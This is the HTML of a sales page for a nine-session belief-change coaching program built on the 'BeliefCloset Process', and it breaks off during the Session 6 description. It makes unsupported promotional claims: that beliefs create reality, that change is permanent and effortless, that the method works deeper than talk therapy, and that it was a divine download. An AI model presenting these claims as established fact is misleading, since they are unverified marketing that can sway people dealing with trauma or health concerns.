alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000000;">Beliefs are the<em> foundation</em> of your consciousness, upon which your thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>You literally <span style="text-decoration: underline;">create your reality</span> with your beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a unstable ground, it doesn''t matter how much redecorating you do. The house will eventually buckle and collapse.\n\nEven if you fervently practice meditation, visualization, or business building skills, sneaky saboteurs in the basement of your mind will pull the foundation out from under you. Success and happiness will elude you. Your life dreams will collapse.\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything in your life, preventing you from doing what you came here to do.\n\n<strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n 	<li><strong><em>I''m not enough.</em></strong></li>\n 	<li><strong><em>I can''t do it.</em></strong></li>\n 	<li><strong><em>I''m not worthy.</em></strong></li>\n 	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n 	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n 	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n 	<li><strong><em>There''s something wrong with me.</em></strong></li>\n 	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n 	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n 	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background – like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep it resides in the subconscious mind, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\nThe same thing is true in your subconscious mind:\n\n<strong>First, clear your old beliefs out of the way. THEN, when you install new, empowering beliefs, they will grow and flourish in your life.</strong>\n\n<strong>It''s that simple.</strong>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text">\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that can dive down into the core of your psyche – your subconscious mind – deeper than words can go, deeper than talk therapy can go, deeper than new ideas, new behaviors, or a weekend workshop.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life is different.</strong>\n<div class="parg-text">\n\nA shift at the core of the psyche has a palpable <em>feel </em>immediately. It expands outward into your life like ripples in a still pond. It moves outward easily, and effortlessly. <strong>The new belief you chose simply manifests – without resistance or struggle – without the need for repetition or continued processing.</strong>\n<p style="text-align: center;"><span style="color: #ff0000;"><strong>Learn  about our Coaching Program Here</strong></span></p>\n\n</div>\n<h1>Beliefs Are The Lens You See The World Through</h1>\n<div class="parg-text">\n\n<strong><em>How you see yourself, and what you think about yoursel</em><em>f,</em> is determined by your core beliefs </strong>– the ones indoctrinated into you by your parents, family members, and caregivers when you were a child.\n<div class="parg-text">\n\n<em>How you view, interact with, and react to others </em>is colored by the beliefs about "others" you absorbed and learned at a young age.\n<div class="parg-text">\n\n<img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world</em></strong> <strong>is shaped, colored, and distorted by your beliefs. </strong>The opportunities you see for yourself in the world are limited by your beliefs about what is possible for you. That''s why beliefs are often referred to as <i>limiting beliefs – </i>because they limit your possibilities.\n\n<em><strong>Throughout your life, your experiences have been shaped by the beliefs you accumulated since your birth.  (And even before your birth...)</strong></em>\n<div class="parg-text">\n\nWhen you change the lens of your beliefs, you change <strong>both</strong> your perceptions <strong><span style="text-decoration: underline;">and</span></strong> your experiences. <span style="color: #000080;"><strong>Change your beliefs, and your circumstances and your possibilities also change.</strong></span>\n<div class="parg-text">\n\n<span style="color: #000000;"><strong> It''s that simple. Except...</strong></span>\n\n</div>\n</div>\n</div>\n</div>\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text">\n\nMany people say, <em>"Your beliefs create your reality." </em>Many people will tell you to "<em>Just change your beliefs!</em>"  But it''s not that easy.  You need specific tools that change your beliefs <em>permanently</em>.  <strong>Beliefs </strong><strong>reside in your subconscious mind, below the level of your conscious awareness, so you need tools that make changes at that depth – in the subconscious. </strong>\n\n</div>\n<div class="parg-text">\n\n<strong>When you were an infant, before you could speak, your parents and caregivers began the process of your indoctrination.</strong> Those indoctrinated beliefs are still buried deep in your pre-verbal (or <em>implicit</em>) memory. Most methods can''t reach down into that level.\n\n</div>\n<div class="parg-text">\n\n<strong>Those folks indoctrinated you for a good reason: they wanted you to survive and thrive.</strong> Since their beliefs allowed <em>them</em> to survive,  they wanted <em>you</em> to have the same beliefs. They thought you needed them.  They never questioned whether they were a good fit for you. They didn''t know any better.  It''s what <em>their parents</em> did to<em> them</em>.\n\n</div>\n<div class="parg-text">\n\n<strong>You accepted this early programming eagerly,</strong> because you wanted to be <em>like </em>your parents, so they would <em>like you. </em> This is a survival mechanism inside of all animals.  The more you are like your parents, the less likely they are to abandon you,  reject you, or leave you out for the wolves.\n\n<strong>When you got older, you began to question some of those beliefs, and you decided to believe other things instead. </strong>However, your first beliefs remained in your subconscious, playing havoc with your life.  The ones you <em>didn''t question</em> became "That''s what''s true about me. That''s just how the world is."\n\n<strong>Take this opportunity to <em>question</em> <i>all of your beliefs, get rid of the ones that aren''t working for you, </i>and <em>choose new ones consciously.</em></strong>  What you choose will determine your experience from this moment forward.\n\n</div>\n<h1>Why You React The Way You Do</h1>\n<div class="parg-text">\n\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself:\n\n</div>\n<div class="parg-text">\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\n</div>\n<ul>\n 	<li>Why did I say that?</li>\n 	<li>Why did I do that?</li>\n 	<li>What''s wrong with me?</li>\n 	<li>Why didn''t I choose love?</li>\n 	<li>What caused me to react?</li>\n 	<li>What the hell just happened?</li>\n</ul>\n<strong><em>Sudden Reaction Syndrome</em></strong> can be traced back to the beliefs and experiences buried deep in your subconscious mind. When your early childhood wounds get triggered, old patterns of response jump up and hijack your logical, adult mind. You can''t help it.\n<div class="parg-text">\n\nThese programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. You react in a way that feels suddenly out of conscious control.\n\n</div>\n<div class="parg-text">\n\n<strong>You can change these reactive patterns – if you''re willing to clean out your basement, where your old wounds and traumas from your childhood live.</strong>\n\n</div>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text">\n\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely? Did it stay away? Or did it return?</strong>\n\n</div>\n<div class="parg-text">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people some of the time. If a method creates permanent change, it''s a good methodology for you. But most methods create only temporary relief. The old beliefs or problems return, causing the same problem to appear over and over again.\n\n</div>\n<strong>Here''s why other methods don''t work very well:</strong>\n<ul class="indented">\n 	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you decide to install. You say them over and over, all day long, but they don''t change anything at the subconscious level. Repeating affirmative statements is like stomping on a weed, hoping they die.  It makes you feel better for awhile, but those good feelings fade quickly – because the earlier beliefs haven''t been eliminated. So you''re constantly fighting against yourself.</li>\n 	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. For example, Byron Katie''s <em>The Work</em> helps you wake up to the impact the belief has had in your life, and you can see that it''s false at the conscious level. But this realization doesn''t clear the belief at the causal level, where beliefs are stored, in the subconscious mind.</li>\n 	<li><span style="color: #333399;"><strong>Tap Your Problem Away.</strong></span>  Some belief-change techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They help to remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed up (like an acupuncture treatment), and you can move forward. But too often, you re-meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text">\n\nIf your old beliefs pop back up later, the process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong>\n\n</div>\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n 	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n 	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text">\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and re-create the same problem – over and over again.\n\n</div>\n<div class="parg-text">\n\n<strong>Learn to </strong><strong style="font-style: italic;">Clear Your Beliefs </strong><strong>permanently </strong>with the <em>Clear Beliefs Coaching Program.</em>\n\n</div>\n<h1>Imagine Living the Life You Truly Desire</h1>\n<div class="parg-text">\n\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\nYou''re no longer held back by old beliefs and stories.\n\nThere''s no resistance to doing what needs to be done.\n\nYou feel joy and positive energy as you move forward to create the life of your dreams.\n<h1>Begin With A Mind Makeover</h1>\n<div class="parg-text">\n\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n<div class="parg-text">\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n<div class="parg-text">\n\nThose discouraging words can stop you from moving forward. They WILL come up – it''s inevitable. It''s how beliefs work. So you need a way to clear those negative voices.\n<div class="parg-text">\n\n<strong><em>Clear Your Beliefs Coaching</em> is a unique approach to solving this dilemma. The process changes your beliefs at the core of the psyche, so they never return.</strong>\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text">\n\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n<div class="parg-text">\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong>\n\n</div>\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n<div class="parg-text">\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n<div class="parg-text">\n\nDuring the past fifteen years, thousands of our clients have cleared almost every type of problem and issue known. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n</div>\n<h1>The <em>Clear Your Beliefs Coaching Program</em> can:</h1>\n<ul class="indented">\n 	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n 	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n 	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n 	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<div class="parg-text">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 9-week <em>Clear Your Beliefs</em> program, your coach will invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\n</div>\n<div class="parg-text">\n\nIf you''re ready to remove limitations that have held you back, and create the life of your dreams, register for this carefully guided 9-part program, skillfully led by your Clear Beliefs coach, along with the recorded program by Lion Goodman, creator of the <em>Clear Beliefs Process<strong>. </strong></em>\n\n</div>\n<div class="parg-text">\n\nDuring each session, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\n</div>\n<div class="parg-text">\n\nThe Clear Your Beliefs program includes seven pre-recorded guided sessions, which you can download and listen to anytime, plus nine live coaching sessions with a Certified Clear Beliefs Coach. They will meet with you once each week (or as you arrange, based on your schedule) to review the work you''ve done using the recorded class, and prepare you for the next session. Your coach will help you go deeper than you could possibly go on your own, guiding you carefully into the depths of your own subconscious beliefs, core wounds, childhood traumas, and blocks. You will learn how to clear them, one by one.\n\n</div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n 	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n 	<li>Remove resistance and barriers</li>\n 	<li>Open doors to new opportunities</li>\n 	<li>Eliminate pain and suffering from the past</li>\n 	<li>Experience more fulfillment in your relationships</li>\n 	<li>Attract more abundance and prosperity</li>\n 	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<div class="parg-text">\n\n<strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n</div>\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\n\nAs a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.\n\nI was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs Coaching </em></strong>program, we''ll guide you shift beliefs and patterns that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>\n\nYour old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes, plus customized individual work with your professional <em>Clear Your Beliefs Coach</em> follow up on the  work you do between sessions. You''ll experience nine sessions of deep healing and transformation, going deeper and deeper with your coach. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There''s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<div class="parg-text">\n\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience.  In addition, you''ll be connected to one of our awesome <strong>Certified Clear Beliefs Coaches</strong> (they''re all over the world, so we can accommodate your schedule).\n\nEach week, you''ll learn more about your old limiting and negative beliefs, and you''ll change them – permanently – with the <em>BeliefCloset Process</em>, a proven technology for inner transformation and empowerment, along with other techniques such as BodyWisdom, Voice Dialogue, and Inner Child work, as guided by your coach.  You''ll feel freer, more open, less reactive, more motivated, and able to carry out the actions that you''ve wanted to do for a long time.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<h5>Your 9 Sessions:</h5>\n<h5><span class="session">Session 0: Getting to Know Your Issues and Beliefs </span></h5>\nIn your first meeting with your coach, you''ll get to know each other, and your coach will give you the assignment of beginning to document your beliefs in every area of your life.  You''ll look deeply into your childhood experiences, and identify where your negative and limiting beliefs came from, and why they continue to hold you back, or interfere with your forward momentum.\n\nYour coach will give an overview of the work you''ll do together, and will schedule the next eight sessions with you.  You will work together to identify the particular issues and patterns you want to change, and the course will be customized to your needs.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1: </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you''ll examine your old beliefs, and determine which ones no longer serve you. It''s time to discard them and clear some space! You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n 	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n 	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n 	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n 	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2: </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet. It''s time to haul them out, and toss them out! You don''t need them anymore. If you hear critical inner voices berating you, don''t miss this session. Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n 	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n 	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n 	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3: </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of? </em>If your answer is "Anything..." you don''t need this session. But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use? You''ll fail anyway. You don''t deserve happiness – look at you!" </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n 	<li>Identify old beliefs that stand between you and creating the life you want</li>\n 	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n 	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4: </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure? Or are you anxious about the future? If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned "what love is" from your parents – so it''s no wonder that you''re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like. In your family, love may have been contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n 	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n 	<li>See which of your beliefs now interfere with your intimate relationships</li>\n 	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5: </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy? Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n 	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n 	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n 	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n 	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6: </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" 